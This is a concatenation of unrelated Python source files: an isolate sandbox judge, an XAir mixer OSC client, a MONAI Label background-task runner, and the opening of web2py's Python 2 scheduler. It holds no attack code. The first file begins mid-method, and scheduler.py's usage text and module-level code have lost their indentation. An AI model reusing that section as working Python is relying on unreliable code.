        isolate_head = ["isolate", "--run", "--meta=/dev/stdout", "-s", "--cg", "--cg-timing", "--box-id={}".format(box_id)]
        isolate_mid = []
        isolate_tail = ["--"] + self._command
        isolate_head.append("--dir=/etc") # for g++ compilers through /etc/alternatives
        if self._env:
            for (tp, host, virtual) in self._env._get_instructions():
                if tp == 0: # dir
                    isolate_mid.append("--dir={}={}".format(host, virtual))
                elif tp == 1:  # plain file copy
                    shutil.copyfile(host, os.path.join(self._workdir, virtual[1:]))
                elif tp == 2:  # executable file copy
                    shutil.copyfile(host, os.path.join(self._workdir, virtual[1:]))
                    os.chmod(os.path.join(self._workdir, virtual[1:]), 0o755)
        if self._limits:
            if self._limits.memorylimit:
                isolate_head.append("--cg-mem={}".format(self._limits.memorylimit))
            if self._limits.proclimit:
                isolate_head.append("--processes={}".format(self._limits.proclimit))
            TL = self._limits.timelimit
            WTL = self._limits.timelimit_wall
            def make_time(tm):
                # milliseconds -> "sec.mmm" as isolate expects
                return "%d.%03d" % (tm // 1000, tm % 1000)
            if TL:
                isolate_head.append("--time={}".format(make_time(TL)))
            if WTL:
                isolate_head.append("--wall-time={}".format(make_time(WTL)))
        isolate_head.append("--env=PATH=/usr/local/bin:/usr/bin/:/bin")
        # Pre-create empty stdin/stdout/stderr files inside the box.
        os.mkdir(os.path.join(self._workdir, "_files"))
        for fl in ["stdin", "stdout", "stderr"]:
            with open(os.path.join(self._workdir, "_files", fl), "w") as f:
                pass
        if self._in_file:
            shutil.copyfile(self._in_file, os.path.join(self._workdir, "_files", "stdin"))
        isolate_head.append("--stdin={}".format("_files/stdin"))
        isolate_head.append("--stdout={}".format("_files/stdout"))
        isolate_head.append("--stderr={}".format("_files/stderr"))
        cmd = isolate_head + isolate_mid + isolate_tail
        if not self._quite:
            if self._userdesc:
                print("isolate-run box={} [{}]".format(box_id, self._userdesc))
            else:
                print("isolate-run box={}".format(box_id))
        res = subprocess.run(cmd, stdout=subprocess.PIPE, universal_newlines=True)
        # isolate exits 1 for a "failed" program (TL/RE/...), which is still
        # a parseable outcome; anything else is an isolate-level error.
        if res.returncode not in [0, 1]:
            raise Exception("Isolate returned bad exit code")
        self._result = self._parse_result(res.stdout)
        if self._result == JobResult.FL:
            self._failure_reason = "Returned by checker"
        with self._lock:
            self._cv.notify_all()

    def _clean(self, box_id):
        # Best effort: never let cleanup failures mask the job result.
        if self._workdir:
            try:
                subprocess.call(["isolate", "--cleanup", "--cg", "--box-id={}".format(box_id)], timeout=1)
            except Exception as ex:
                print("warning: failed to cleanup: {}".format(ex))

    def _just_fail(self):
        """Mark the job failed without running it (e.g. judge shutdown)."""
        self._failure_reason = "Aborted"
        self._result = JobResult.FL
        with self._lock:
            self._cv.notify_all()

    def _work(self, box_id):
        """Execute the job in box *box_id*; runs on a judge worker thread."""
        self._box_id = box_id
        try:
            self._step = "init"
            self._init(box_id)
            self._step = "run"
            self._run(box_id)
        except Exception as ex:
            self._failure_reason = "During {}\n{}\n{}".format(self._step, str(ex), traceback.format_exc())
            self._result = JobResult.FL
            with self._lock:
                self._cv.notify_all()
        if self._c_handler:
            if self._c_args:
                self._c_handler(*self._c_args)
            else:
                self._c_handler()

    def get_timeusage(self):
        """CPU time used, ms (blocks until finished)."""
        self.wait()
        return self._timeusage

    def get_wallusage(self):
        """Wall-clock time used, ms (blocks until finished)."""
        self.wait()
        return self._wallusage

    def get_memusage(self):
        """Memory used, kb (blocks until finished)."""
        self.wait()
        return self._memusage

    def is_running(self):
        """True while the sandboxed command itself is executing."""
        return self._step == "run"

    def is_ready(self):
        """True once a result is available (does not block)."""
        with self._lock:
            return self._result is not None

    def result(self):
        """JobResult of this run (blocks until finished)."""
        self.wait()
        return self._result

    def time_used(self):
        """Alias of get_timeusage()."""
        self.wait()
        return self._timeusage

    def wall_usage(self):
        """Alias of get_wallusage()."""
        self.wait()
        return self._wallusage

    def exit_code(self):
        """Exit code reported by isolate, or None if none was reported (blocks)."""
        self.wait()
        return self._exitcode

    def failure_reason(self):
        """Explanation of a failure, otherwise None (blocks)."""
        self.wait()
        return self._failure_reason

    def wait(self):
        """Block until the job has a result."""
        if self._result is not None:  # fast path without taking the lock
            return
        with self._cv:
            while self._result is None:
                self._cv.wait()

    def get_object_path(self, *path):
        """Host path of *path* inside the box working directory."""
        if not hasattr(self, "_box_id"):
            raise Exception("EPIC FAIL")
        return os.path.join(self._workdir, *path)

    def get_stdout_path(self):
        """Host path of the job's captured stdout."""
        return self.get_object_path("_files", "stdout")

    def get_stderr_path(self):
        """Host path of the job's captured stderr."""
        return self.get_object_path("_files", "stderr")

    def release(self):
        """
        Releases job and destroys all result
        """
        if hasattr(self, "_box_id"):
            self.wait()
            self._clean(self._box_id)
            self._judge._returnid(self._box_id)
            delattr(self, "_box_id")

    def __lt__(self, other):
        # FIFO ordering for jobs of equal priority in the judge's queue.
        return self.__time < other.__time
class IsolatedJudge:
    """Thread-pooled judge executing IsolatedJob instances in isolate boxes."""

    def __init__(self):
        self._num_threads = 4
        # Queue entries are (priority, seq, job).  `seq` is a monotonically
        # increasing tie-breaker: without it, two entries of equal priority
        # made heapq compare the payloads directly, which raised TypeError
        # for the (-1000, None) shutdown sentinels pushed by __exit__.
        self._seq = itertools.count()
        self._queue = queue.PriorityQueue()
        self._boxes = queue.Queue()  # pool of free isolate box ids
        self._running = True
        # Twice as many boxes as workers, ids starting at 300.
        for i in range(2 * self._num_threads):
            self._boxes.put(300 + i)
        self._threads = []
        for i in range(self._num_threads):
            thread = threading.Thread(target=IsolatedJudge._work, args=(self,))
            thread.start()
            self._threads.append(thread)

    def __enter__(self):
        return self

    def __exit__(self, *_):
        print("shutting down judging system")
        self._running = False
        # One wake-up sentinel per worker; -1000 sorts before any real
        # priority (valid user range is [0; 99]).
        for i in range(self._num_threads):
            self._queue.put((-1000, next(self._seq), None))
        for thr in self._threads:
            thr.join()
        # Fail whatever was still queued so any waiters are released.
        while not self._queue.empty():
            job = self._queue.get()[-1]
            if job is not None:
                job._just_fail()

    def _work(self):
        # Worker loop: run queued jobs in a free box until shutdown.
        while True:
            job = self._queue.get()[-1]
            if not self._running or job is None:
                return
            job._work(self._boxes.get())

    def _returnid(self, box_id):
        """Return a finished job's box id to the free pool."""
        self._boxes.put(box_id)

    def new_job(self, env, limits, *command, in_file=None, c_handler=None, c_args=None, priority=50, userdesc=None):
        """
        Creates new runnable Job

        Keyword Arguments:
        env:         use judge.new_env()
        limits:      use judge.new_limits()
        in_file:     path to the stdin.
        c_handler:   completion handler to call, optional.
        c_args:      args to path to completion handler
        priority:    the priority of the task, lower is more important, should be in range [0; 99].

        Other arguments:
        Specify the command to run in a standard way
        """
        job = IsolatedJob(self, env, limits, *command, in_file=in_file, c_handler=c_handler, c_args=c_args)
        if userdesc:
            job.set_userdesc(userdesc)
        self._queue.put((priority, next(self._seq), job))
        return job

    def new_env(self):
        """Create an empty sandbox environment description."""
        return IsolatedJobEnvironment()

    def new_limits(self):
        """Create a fresh (mostly unlimited) resource-limit set."""
        return SimpleJobLimits()

    def new_job_helper(self, target):
        """Create a high-level helper for a known compile/invoke target."""
        import pmaker.jobhelper
        if target == "compile.g++":
            return pmaker.jobhelper.JobHelperCompilation(self)
        if target == "compile.py3":
            return pmaker.jobhelper.JobHelperPyCompilation(self)
        if target == "invoke.g++" or target == "invoke.py3":
            return pmaker.jobhelper.JobHelperInvokation(self)
        if target == "invoke.bash":
            return pmaker.jobhelper.JobHelperBashInvokation(self)
        raise ValueError("Unsupported job helper type {}".format(target))
def new_judge():
    """Create the default judge backend (isolate-based)."""
    return IsolatedJudge()
|
xair.py | "This modules managed communications with the XAir mixer"
# part of xair-remote.py
# Copyright (c) 2018, 2021 Peter Dikant
# Additions Copyright (c) 2021 Ross Dickson
# Some rights reserved. See LICENSE.
import time
import threading
import socket
import netifaces
from pythonosc.dispatcher import Dispatcher
from pythonosc.osc_server import BlockingOSCUDPServer
from pythonosc.osc_message import OscMessage
from pythonosc.osc_message_builder import OscMessageBuilder
class OSCClientServer(BlockingOSCUDPServer):
    "The OSC communications agent"
    def __init__(self, address, dispatcher):
        # Bind to an ephemeral local port; *address* is the (host, port) of
        # the remote XAir mixer that outgoing messages are sent to.
        super().__init__(('', 0), dispatcher)
        self.xr_address = address
    def send_message(self, address, value):
        "Packs a message for sending via OSC over UDP."
        builder = OscMessageBuilder(address=address)
        # Normalise *value* into a list of OSC arguments:
        # None -> no args, list -> as-is, scalar -> one-element list.
        if value is None:
            values = []
        elif isinstance(value, list):
            values = value
        else:
            values = [value]
        for val in values:
            builder.add_arg(val)
        msg = builder.build()
        self.socket.sendto(msg.dgram, self.xr_address)
class XAirClient:
    """
    Handles the communication with the X-Air mixer via the OSC protocol
    """
    # Seconds to wait for the mixer's /xinfo reply before giving up.
    _CONNECT_TIMEOUT = 0.5
    # NOTE(review): _WAIT_TIME is not referenced inside this class --
    # presumably used by callers or historical; confirm before removing.
    _WAIT_TIME = 0.002
    # Seconds between keep-alive /xremotenfb messages in refresh_connection().
    _REFRESH_TIMEOUT = 5
    XAIR_PORT = 10024  # UDP port the X-Air mixer listens on
    # Class-level default; replaced by the /xinfo reply in msg_handler().
    info_response = []
    def __init__(self, address, state):
        self.state = state
        dispatcher = Dispatcher()
        # Route every incoming OSC message through msg_handler.
        dispatcher.set_default_handler(self.msg_handler)
        self.server = OSCClientServer((address, self.XAIR_PORT), dispatcher)
        # Serve replies on a daemon thread so process shutdown is not blocked.
        worker = threading.Thread(target=self.run_server)
        worker.daemon = True
        worker.start()
    def validate_connection(self):
        "Confirm that the connection to the XAir is live, otherwise initiates shutdown."
        self.send('/xinfo')
        # Give the mixer a moment to answer; msg_handler fills info_response.
        time.sleep(self._CONNECT_TIMEOUT)
        if len(self.info_response) > 0:
            print('Successfully connected to %s with firmware %s at %s.' % (self.info_response[2],
                self.info_response[3], self.info_response[0]))
        else:
            print('Error: Failed to setup OSC connection to mixer.',
                  'Please check for correct ip address.')
            # Signal the shared state so the rest of the app stops too.
            self.state.quit_called = True
            if self.server is not None:
                self.server.shutdown()
                self.server = None
    def run_server(self):
        "Start the OSC communications agent in a separate thread."
        try:
            self.server.serve_forever()
        except KeyboardInterrupt:
            self.quit()
    def stop_server(self):
        # Idempotent: safe to call after the server is already gone.
        if self.server is not None:
            self.server.shutdown()
            self.server = None
    def quit(self):
        # Prefer a coordinated shutdown through the shared state object.
        if self.state is not None:
            self.state.shutdown()
        else:
            self.stop_server()
    def msg_handler(self, addr, *data):
        "Dispatch received OSC messages based on message type."
        if self.state is None or self.state.quit_called:
            self.stop_server()
            return
        #print 'OSCReceived("%s", %s, %s)' % (addr, tags, data)
        # Parameter-change addresses are forwarded to the state object as
        # single values; meters arrive as blobs; /-... internal traffic is
        # ignored; anything else is printed for debugging.
        if addr.endswith('/fader') or addr.endswith('/on') or addr.endswith('/level') or \
                addr.startswith('/config/mute') or addr.endswith('/gain') or addr.startswith('/fx/'):
            self.state.received_osc(addr, data[0])
        elif addr == '/xinfo':
            self.info_response = data[:]
        elif addr.startswith('/meters'):
            self.state.received_meters(addr, data)
        elif addr.startswith('/-'):
            pass
        else: #if self.state.debug and addr.start:
            print('OSCReceived("%s", %s)' % (addr, data))
    def refresh_connection(self): # the main loop
        """
        Tells mixer to send changes in state that have not been received from this OSC Client
        /xremote        - all parameter changes are broadcast to all active clients (Max 4)
        /xremotefnb     - No Feed Back. Parameter changes are only sent to the active clients
                        which didn't initiate the change
        """
        if self.state.debug:
            print("Refresh Connection %s" % self.state.levels)
        try:
            while not self.state.quit_called and self.server is not None:
                self.server.send_message("/xremotenfb", None)
                if self.state.levels or self.state.clip:
                    # using input levels, as these match the headamps when channels are remapped
                    time.sleep(self._REFRESH_TIMEOUT)
                    self.send(address="/meters", param=["/meters/2"])
                if self.state.clip: # seems to crash if clipping protection runs for more than one cycle
                    if self.state.debug:
                        print("start auto level")
                    self.state.clip = False
#                    if self.state.screen_obj is not None:
#                        self.state.screen_obj.gpio_button[1].disable[0] = 1
                time.sleep(self._REFRESH_TIMEOUT)
            if self.state.quit_called:
                self.quit()
                return
        except KeyboardInterrupt:
            self.quit()
        except socket.error:
            self.quit()
    def send(self, address, param=None):
        "Call the OSC agent to send a message"
        self.server.send_message(address, param)
def find_mixer():
    "Search for the IP address of the XAir mixer"
    print('Searching for mixer...')
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    client.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, True)
    client.settimeout(5)
    try:
        # Broadcast an /xinfo probe on every interface that has an IPv4
        # broadcast address; interfaces without one are skipped.
        for iface in netifaces.interfaces():
            try:
                bcast = netifaces.ifaddresses(iface)[netifaces.AF_INET][0]['broadcast']
                client.sendto("/xinfo\0\0".encode(), (bcast, XAirClient.XAIR_PORT))
            except (KeyError, IndexError, OSError):
                # Narrowed from a bare except: interface has no usable
                # broadcast address (or the send failed) -- just skip it.
                pass
        try:
            response = OscMessage(client.recv(512))
        except socket.timeout:
            print('No server found')
            return None
    finally:
        # Close the socket on every path; the original leaked it when the
        # receive timed out.
        client.close()
    if response.address != '/xinfo':
        print('Unknown response')
        return None
    print('Found ' + response.params[2] + ' with firmware ' + response.params[3] + ' on IP ' + response.params[0])
    return response.params[0]
|
async_tasks.py | # Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import json
import logging
import os
import os.path
import platform
import subprocess
import uuid
from collections import deque
from datetime import datetime
from threading import Thread
from typing import Dict
import psutil
from monailabel.config import settings
logger = logging.getLogger(__name__)
background_tasks: Dict = {}
background_processes: Dict = {}
def _task_func(task, method):
    # Launch the app-runner script as a subprocess and stream its output
    # into the task record until it exits.
    base_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
    script = "run_monailabel_app.bat" if any(platform.win32_ver()) else "run_monailabel_app.sh"
    # Prefer the repo-local copy under scripts/; otherwise rely on PATH.
    if os.path.exists(os.path.realpath(os.path.join(base_dir, "scripts", script))):
        script = os.path.realpath(os.path.join(base_dir, "scripts", script))
    cmd = [
        script,
        settings.APP_DIR,
        settings.STUDIES,
        method,
        json.dumps(task["request"]),
    ]
    logger.info(f"COMMAND:: {' '.join(cmd)}")
    # stderr is folded into stdout so one reader loop captures everything.
    process = subprocess.Popen(
        cmd,
        stderr=subprocess.STDOUT,
        stdout=subprocess.PIPE,
        universal_newlines=True,
        env=os.environ.copy(),
    )
    task_id = task["id"]
    # Register the live process so stop_background_task() can kill it.
    background_processes[method][task_id] = process
    task["status"] = "RUNNING"
    # Keep only the most recent output lines to bound memory use.
    task["details"] = deque(maxlen=20)
    plogger = logging.getLogger(f"task_{method}")
    while process.poll() is None:
        line = process.stdout.readline()
        line = line.rstrip()
        if line:
            plogger.info(line)
            task["details"].append(line)
    logger.info("Return code: {}".format(process.returncode))
    background_processes[method].pop(task_id, None)
    process.stdout.close()
    task["end_ts"] = datetime.today().strftime("%Y-%m-%d %H:%M:%S")
    # stop_background_task() may have already marked the task STOPPED.
    if task["status"] == "RUNNING":
        task["status"] = "DONE" if process.returncode == 0 else "ERROR"
def run_background_task(request, method, debug=False):
    """Register a task record for *method* and launch it (inline or threaded)."""
    task = {
        "id": uuid.uuid4(),
        "status": "SUBMITTED",
        "request": request,
        "start_ts": datetime.today().strftime("%Y-%m-%d %H:%M:%S"),
    }
    # Lazily create the per-method bookkeeping structures.
    background_tasks.setdefault(method, []).append(task)
    background_processes.setdefault(method, dict())
    if debug:
        # Run inline so output and errors surface immediately.
        _task_func(task, method)
    else:
        thread = Thread(target=functools.partial(_task_func, task, method))
        thread.start()
    return task
def stop_background_task(method):
    """Kill the first registered running process for *method*, if any."""
    logger.info(f"Kill background task for {method}")
    if not background_tasks.get(method) or not background_processes.get(method):
        return None
    task_id, process = next(iter(background_processes[method].items()))
    # Kill the whole process tree: the runner script spawns children.
    children = psutil.Process(pid=process.pid).children(recursive=True)
    for child in children:
        logger.info(f"Kill:: Child pid is {child.pid}")
        child.kill()
    logger.info(f"Kill:: Process pid is {process.pid}")
    process.kill()
    background_processes[method].pop(task_id, None)
    logger.info(f"Killed background process: {process.pid}")
    # Update the matching task record so _task_func leaves it STOPPED.
    task = [task for task in background_tasks[method] if task["id"] == task_id][0]
    task["status"] = "STOPPED"
    task["end_ts"] = datetime.today().strftime("%Y-%m-%d %H:%M:%S")
    return task
def tasks(method):
    """
    Return the list of task records submitted for *method* (empty if none).
    """
    return background_tasks.get(method, [])
def processes(method):
    """
    Returns Dict of all task id => process
    """
    # Literal {} instead of dict(): same value, avoids a needless call.
    return background_processes.get(method, {})
def run_main():
    """CLI entry point: run one background task synchronously for debugging."""
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument("-a", "--app", required=True)
    parser.add_argument("-s", "--studies", required=True)
    parser.add_argument("-m", "--method", default="info")
    parser.add_argument("-r", "--request", default="{}")
    parser.add_argument("-d", "--debug", action="store_true")
    args = parser.parse_args()

    args.app = os.path.realpath(args.app)
    args.studies = os.path.realpath(args.studies)

    settings.APP_DIR = args.app
    settings.STUDIES = args.studies

    logging.basicConfig(
        level=(logging.DEBUG if args.debug else logging.INFO),
        # Bug fix: the placeholder must be "%(message)s" -- the original
        # "%(message)" is an incomplete %-conversion, so formatting log
        # records failed / lost the actual message text.
        format="[%(asctime)s] [%(levelname)s] (%(name)s.%(funcName)s:%(lineno)d) - %(message)s",
        datefmt="%Y-%m-%d %H:%M:%S",
    )
    run_background_task(json.loads(args.request), args.method, debug=True)
if __name__ == "__main__":
    # Allow running this module directly as a CLI for manual testing.
    run_main()
|
scheduler.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
USAGE = """
## Example
For any existing app
Create File: app/models/scheduler.py ======
from gluon.scheduler import Scheduler
def demo1(*args,**vars):
print 'you passed args=%s and vars=%s' % (args, vars)
return 'done!'
def demo2():
1/0
scheduler = Scheduler(db,dict(demo1=demo1,demo2=demo2))
## run worker nodes with:
cd web2py
python web2py.py -K myapp
or
python gluon/scheduler.py -u sqlite://storage.sqlite \
-f applications/myapp/databases/ \
-t mytasks.py
(-h for info)
python scheduler.py -h
## schedule jobs using
http://127.0.0.1:8000/myapp/appadmin/insert/db/scheduler_task
## monitor scheduled jobs
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_task.id>0
## view completed jobs
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_run.id>0
## view workers
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_worker.id>0
## To install the scheduler as a permanent daemon on Linux (w/ Upstart), put
## the following into /etc/init/web2py-scheduler.conf:
## (This assumes your web2py instance is installed in <user>'s home directory,
## running as <user>, with app <myapp>, on network interface eth0.)
description "web2py task scheduler"
start on (local-filesystems and net-device-up IFACE=eth0)
stop on shutdown
respawn limit 8 60 # Give up if restart occurs 8 times in 60 seconds.
exec sudo -u <user> python /home/<user>/web2py/web2py.py -K <myapp>
respawn
## You can then start/stop/restart/check status of the daemon with:
sudo start web2py-scheduler
sudo stop web2py-scheduler
sudo restart web2py-scheduler
sudo status web2py-scheduler
"""
import os
import time
import multiprocessing
import sys
import threading
import traceback
import signal
import socket
import datetime
import logging
import optparse
import types
import Queue
if 'WEB2PY_PATH' in os.environ:
sys.path.append(os.environ['WEB2PY_PATH'])
else:
os.environ['WEB2PY_PATH'] = os.getcwd()
if not os.environ['WEB2PY_PATH'] in sys.path:
sys.path.append(os.environ['WEB2PY_PATH'])
try:
from gluon.contrib.simplejson import loads, dumps
except:
from simplejson import loads, dumps
logger = logging.getLogger('web2py.scheduler')
from gluon import DAL, Field, IS_NOT_EMPTY, IS_IN_SET, IS_NOT_IN_DB, IS_INT_IN_RANGE, IS_DATETIME
from gluon.utils import web2py_uuid
QUEUED = 'QUEUED'
ASSIGNED = 'ASSIGNED'
RUNNING = 'RUNNING'
COMPLETED = 'COMPLETED'
FAILED = 'FAILED'
TIMEOUT = 'TIMEOUT'
STOPPED = 'STOPPED'
ACTIVE = 'ACTIVE'
TERMINATE = 'TERMINATE'
DISABLED = 'DISABLED'
KILL = 'KILL'
EXPIRED = 'EXPIRED'
SECONDS = 1
HEARTBEAT = 3 * SECONDS
MAXHIBERNATION = 10
CLEAROUT = '!clear!'
CALLABLETYPES = (types.LambdaType, types.FunctionType,
types.BuiltinFunctionType,
types.MethodType, types.BuiltinMethodType)
class Task(object):
    """In-memory image of one scheduler_task row."""
    def __init__(self, app, function, timeout, args='[]', vars='{}', **kwargs):
        logger.debug(' new task allocated: %s.%s', app, function)
        self.app = app
        self.function = function
        self.timeout = timeout
        # args/vars stay json-encoded until the executor decodes them.
        self.args = args  # json
        self.vars = vars  # json
        # Any remaining row columns (uuid, times, ...) become attributes.
        for extra in kwargs:
            setattr(self, extra, kwargs[extra])
    def __str__(self):
        return '<Task: %s>' % self.function
class TaskReport(object):
    """Outcome of one task run: status plus result/output/traceback."""
    def __init__(self, status, result=None, output=None, tb=None):
        logger.debug(' new task report: %s', status)
        # Log either the failure traceback or the (json) result, not both.
        if tb:
            logger.debug('   traceback: %s', tb)
        else:
            logger.debug('   result: %s', result)
        self.status = status
        self.result = result
        self.output = output
        self.tb = tb
    def __str__(self):
        return '<TaskReport: %s>' % self.status
def demo_function(*argv, **kwargs):
    """ test function """
    # Python 2 only (print statement).  Ticks once per second, argv[0]
    # times, then reports completion.
    for i in range(argv[0]):
        print 'click', i
        time.sleep(1)
    return 'done'
#The two functions below convert simplejson's unicode output back into byte
#strings. This matters especially for decoded dicts that are later passed as
#function keyword arguments: unicode keyword names are not accepted in Python 2.
#Borrowed from http://stackoverflow.com/questions/956867/how-to-get-string-objects-instead-unicode-ones-from-json-in-python
def _decode_list(lst):
    """Return a copy of *lst* with unicode items encoded to utf-8 byte
    strings; nested lists are converted recursively."""
    decoded = []
    for item in lst:
        if isinstance(item, unicode):
            item = item.encode('utf-8')
        elif isinstance(item, list):
            item = _decode_list(item)
        decoded.append(item)
    return decoded
def _decode_dict(dct):
    """Return a copy of *dct* with unicode keys/values encoded to utf-8
    byte strings; list values are converted via _decode_list."""
    decoded = {}
    for key, val in dct.iteritems():
        if isinstance(key, unicode):
            key = key.encode('utf-8')
        if isinstance(val, unicode):
            val = val.encode('utf-8')
        elif isinstance(val, list):
            val = _decode_list(val)
        decoded[key] = val
    return decoded
def executor(queue, task, out):
    """ the background process

    Runs *task* in this (child) process, streaming stdout into the *out*
    queue and finally putting one TaskReport (COMPLETED or FAILED) on
    *queue*. All stdout produced by the task is redirected line-by-line
    to *out* so the parent can persist partial output.
    """
    logger.debug(' task started')

    class LogOutput(object):
        """Facility to log output at intervals"""
        def __init__(self, out_queue):
            self.out_queue = out_queue
            # hijack sys.stdout so every print from the task body is
            # forwarded to the parent through out_queue
            self.stdout = sys.stdout
            sys.stdout = self

        def __del__(self):
            # restore the real stdout when the redirector is dropped
            sys.stdout = self.stdout

        def flush(self):
            pass

        def write(self, data):
            self.out_queue.put(data)

    stdout = LogOutput(out)
    try:
        if task.app:
            os.chdir(os.environ['WEB2PY_PATH'])
            from gluon.shell import env, parse_path_info
            from gluon import current
            # temporarily raise the log level so building the app
            # environment does not spam the worker log
            level = logging.getLogger().getEffectiveLevel()
            logging.getLogger().setLevel(logging.WARN)
            # Get controller-specific subdirectory if task.app is of
            # form 'app/controller'
            (a, c, f) = parse_path_info(task.app)
            _env = env(a=a, c=c, import_models=True)
            logging.getLogger().setLevel(level)
            f = task.function
            functions = current._scheduler.tasks
            if not functions:
                #look into env
                _function = _env.get(f)
            else:
                _function = functions.get(f)
            if not isinstance(_function, CALLABLETYPES):
                raise NameError(
                    "name '%s' not found in scheduler's environment" % f)
            # expose the app environment to the task function
            globals().update(_env)
            args = loads(task.args)
            # keyword names must be byte strings in Python 2, hence the
            # _decode_dict object_hook
            vars = loads(task.vars, object_hook=_decode_dict)
            result = dumps(_function(*args, **vars))
        else:
            ### for testing purpose only
            result = eval(task.function)(
                *loads(task.args, object_hook=_decode_dict),
                **loads(task.vars, object_hook=_decode_dict))
        queue.put(TaskReport(COMPLETED, result=result))
    except BaseException, e:
        tb = traceback.format_exc()
        queue.put(TaskReport(FAILED, tb=tb))
    # drop the redirector explicitly so sys.stdout is restored now
    del stdout
class MetaScheduler(threading.Thread):
    """Base scheduler thread.

    run() is the heartbeat loop; loop() pops tasks and executes each one
    in a child process via async(). This base class implements a demo
    in-memory behaviour; Scheduler (below) overrides pop_task /
    report_task / send_heartbeat / sleep to work against the database.
    """
    def __init__(self):
        threading.Thread.__init__(self)
        self.process = None  # the background process
        self.have_heartbeat = True  # set to False to kill
        self.empty_runs = 0

    def async(self, task):
        """
        starts the background process and returns:
        ('ok',result,output)
        ('error',exception,None)
        ('timeout',None,None)
        ('terminated',None,None)
        """
        db = self.db
        sr = db.scheduler_run
        # out: stream of stdout chunks from the child
        # queue: single-slot channel for the final TaskReport
        out = multiprocessing.Queue()
        queue = multiprocessing.Queue(maxsize=1)
        p = multiprocessing.Process(target=executor, args=(queue, task, out))
        self.process = p
        logger.debug(' task starting')
        p.start()
        task_output = ""
        tout = ""
        try:
            # wake up every sync_output seconds (if set) to flush partial
            # output, otherwise sleep up to the task timeout
            if task.sync_output > 0:
                run_timeout = task.sync_output
            else:
                run_timeout = task.timeout
            start = time.time()
            while p.is_alive() and (
                    not task.timeout or time.time() - start < task.timeout):
                if tout:
                    try:
                        logger.debug(' partial output saved')
                        db(sr.id == task.run_id).update(output=task_output)
                        db.commit()
                    except:
                        # best-effort: losing a partial-output update is ok
                        pass
                p.join(timeout=run_timeout)
                # drain the stdout stream produced since the last wake-up
                tout = ""
                while not out.empty():
                    tout += out.get()
                if tout:
                    logger.debug(' partial output: "%s"' % str(tout))
                    if CLEAROUT in tout:
                        # CLEAROUT sentinel: discard everything before it
                        task_output = tout[
                            tout.rfind(CLEAROUT) + len(CLEAROUT):]
                    else:
                        task_output += tout
        except:
            # e.g. KeyboardInterrupt while joining: kill the child and
            # report the run as STOPPED
            p.terminate()
            p.join()
            self.have_heartbeat = False
            logger.debug(' task stopped by general exception')
            tr = TaskReport(STOPPED)
        else:
            if p.is_alive():
                # loop ended because the timeout elapsed
                p.terminate()
                logger.debug(' task timeout')
                try:
                    # we try to get a traceback here
                    tr = queue.get(timeout=2)
                    tr.status = TIMEOUT
                    tr.output = task_output
                except Queue.Empty:
                    tr = TaskReport(TIMEOUT)
            elif queue.empty():
                # child died without posting a report
                self.have_heartbeat = False
                logger.debug(' task stopped')
                tr = TaskReport(STOPPED)
            else:
                # normal completion (COMPLETED or FAILED report posted)
                logger.debug(' task completed or failed')
                tr = queue.get()
                tr.output = task_output
        return tr

    def die(self):
        """Stop heartbeating and kill any running task process."""
        logger.info('die!')
        self.have_heartbeat = False
        self.terminate_process()

    def give_up(self):
        """Stop heartbeating but let the current task finish."""
        logger.info('Giving up as soon as possible!')
        self.have_heartbeat = False

    def terminate_process(self):
        try:
            self.process.terminate()
        except:
            pass  # no process to terminate

    def run(self):
        """ the thread that sends heartbeat """
        counter = 0
        while self.have_heartbeat:
            self.send_heartbeat(counter)
            counter += 1

    def start_heartbeats(self):
        self.start()

    def send_heartbeat(self, counter):
        # demo implementation; overridden by Scheduler
        print 'thum'
        time.sleep(1)

    def pop_task(self):
        # demo implementation; overridden by Scheduler
        return Task(
            app=None,
            function='demo_function',
            timeout=7,
            args='[2]',
            vars='{}')

    def report_task(self, task, task_report):
        # demo implementation; overridden by Scheduler
        print 'reporting task'
        pass

    def sleep(self):
        pass

    def loop(self):
        """Main work loop: pop a task, execute it, report it; track
        consecutive empty runs and die when max_empty_runs is hit."""
        try:
            self.start_heartbeats()
            while True and self.have_heartbeat:
                logger.debug('looping...')
                task = self.pop_task()
                if task:
                    self.empty_runs = 0
                    self.report_task(task, self.async(task))
                else:
                    self.empty_runs += 1
                    logger.debug('sleeping...')
                    if self.max_empty_runs != 0:
                        logger.debug('empty runs %s/%s',
                                     self.empty_runs, self.max_empty_runs)
                        if self.empty_runs >= self.max_empty_runs:
                            logger.info(
                                'empty runs limit reached, killing myself')
                            self.die()
                    self.sleep()
        except KeyboardInterrupt:
            self.die()
# Allowed value sets used by the IS_IN_SET validators in define_tables().
TASK_STATUS = (QUEUED, RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED, EXPIRED)
RUN_STATUS = (RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED)
WORKER_STATUS = (ACTIVE, DISABLED, TERMINATE, KILL)
class TYPE(object):
    """
    validator that check whether field is valid json and validate its type

    Returns a (value, error) tuple like other web2py validators:
    (value, None) on success — the decoded object instead of the raw
    string when parse=True — or (value, T(...)) on failure.
    """
    def __init__(self, myclass=list, parse=False):
        # myclass: required python type of the decoded json
        # parse: when True, return the decoded object rather than the string
        self.myclass = myclass
        self.parse = parse

    def __call__(self, value):
        try:
            obj = loads(value)
        # BUG FIX: was a bare `except:`, which also swallowed
        # SystemExit/KeyboardInterrupt; json decoders raise
        # ValueError (bad json) or TypeError (non-string input).
        except (ValueError, TypeError):
            from gluon import current
            return (value, current.T('invalid json'))
        if isinstance(obj, self.myclass):
            if self.parse:
                return (obj, None)
            else:
                return (value, None)
        # gluon imported lazily: only error paths need the T() translator
        from gluon import current
        return (value, current.T('Not of type: %s') % self.myclass)
class Scheduler(MetaScheduler):
    """Database-backed scheduler worker.

